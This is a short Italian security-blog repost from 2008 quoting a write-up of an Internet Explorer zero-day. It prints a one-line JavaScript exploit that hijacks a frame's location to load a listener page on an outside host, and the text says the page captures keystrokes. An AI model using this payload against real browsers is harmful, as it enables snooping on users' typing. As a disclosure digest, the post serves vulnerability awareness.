136

Ghost Busters: Zero-day flaw haunts Internet Explorer

by Andrea L. on 25 July 2008

This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this:

javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode.

Ghost Busters | GNUCITIZEN

Vi fornisco direttamente il digest ;)


Post correlati:

  1. Oggi ho proprio voglia di … Clickjacking
  2. Rustock.c – rootkit
  3. GSM cypher is Gone! Crackato! Kaput!
  4. Violati 1.2 Milioni di utenti del servizio TorrentReactor
  5. Aggiungere le SLIC table (SLP 2.0) in un ACPI BIOS OEM

Tagged as: hacking, internet explorer, vulnerability

Leave a Comment

Previous post:

Next post: